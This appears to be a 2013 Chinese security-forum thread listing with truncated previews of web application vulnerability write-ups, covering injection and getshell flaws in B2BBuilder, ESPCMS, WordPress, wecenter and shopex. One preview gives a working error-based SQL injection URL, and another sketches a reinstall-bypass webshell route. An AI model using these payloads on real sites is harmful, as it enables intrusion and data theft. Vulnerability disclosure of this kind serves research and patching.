【我爱T00LS】B2BBuilder头注入后台任意代码执行

看到小伙伴们都在B2Bbuilder 我也凑个热闹0x1 头注入Include/function.phpfunction getip(){if (isset($_SERVER)) {if (isset($_SERVER)) { $realip = $_SERVER;} elseif (isset($_SERVER)) { $realip = $_SERVER;} else { $realip = $_SERVER;}} else {if (getenv("HTTP_X_FORWARDED_FOR")) {

2013-9-23 16:25 31 4633

WordPress < 3.6.1 PHP 对象注入漏洞

0x00 背景当我读到一篇关于Joomla的“PHP对象注射”的漏洞blog后,我挖深了一点就发现Stefan Esser大神在2010年黑帽大会的文章:http://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits-s

2013-9-16 12:29 8 3482

【我爱T00LS】ESPCMS 二次注入

漏洞位于 interface\public.php文件 in_invite 函数中核心代码如下:$ec_member_username_id = $this->member_cookieview('userid'); if ($ec_member_username_id) { $rsMember = $this->get_member_attvalue($ec_member_username_id); } $userid = $ec_member_username_id ? $ec_member_userna

2013-9-8 07:49 28 4443

[我爱t00ls] B2BBuilder GetShell

来凑个热闹 漏洞最新版已修复重装绕过系统安装时 虽然install/index.php 有重装lock验证,但重装代码在 install.php 中 可以直接绕过验证,又结合下面的查询config表 直接写入文件 可以远程getshell getshell 第一步: 公网mysql中新建一个 web_config 表 CREATE TABLE `hy_web_config` ( `id` int(

2013-9-5 21:56 30 4436

[我爱t00ls] B2BBuilder 又一注入漏洞

嘿嘿 看小小abc发了一个B2BBuilder漏洞,于是乎恍然大悟,不能死啃ecshop了,换个口味 就下载了一套B2BBuilder源码,抽根烟观之,在comment.php中文件代码如下:if (!empty($_GET)){if ($_GET==1) $sql="select title from ".NEWSD." where nid=".$_GET;if ($_GET==2) $sql="select title from ".

2013-9-5 02:51 31 4733

[我爱t00ls] B2BBuilder 注入漏洞

最近工作好忙,这不有时间了,看看php代码,不能生锈呢.{:6_440:} 直接上利用方式,大家一看就懂.http://localhost/b2b/aboutus.php?type=12345' aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and

2013-9-5 01:37 17 3739

【我爱T00LS】wecenter 注入漏洞 原anwsion

system/function.inc.phpfunction fetch_ip(){if ($_SERVER and valid_ip($_SERVER)){$ip_address = $_SERVER;}else if ($_SERVER and $_SERVER){$ip_address = $_SERVER;}else if ($_SERVER){$ip_address = $_SERVER;}else if ($_SERVER){$ip_address = $_SERVER;}if ($ip_address === FALSE){$ip_add

2013-9-4 16:43 46 6139

【我爱T00LS】162100导航 GETSHELL

./inc/require/z_other_face_up.php$web = 'face-'.urlencode($session);//这个是从cookie中获取的,为cookie explode |之后的第一个字符//gmdate("YmdHis", time() + (floatval($web) * 3600));//本机上传if ($_POST == 1) { if ($web == 0) { err('系统设定为禁止上传。'); } if (is_arr

2013-9-4 16:40 21 3927

【我爱T00LS】易想团购 注入漏洞

以前截图存的 代码就不翻啦 直接放图片了第一个第二个

2013-9-4 16:37 10 3377

【我爱T00LS】shopex Getshell

ctl.product.phpclass ctl_product extends shopPage{ var $_call = 'call'; var $type = 'goods'; var $seoTag = array('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_price','update_time','goods_bn'); function ctl_product

2013-9-4 16:30 55 5427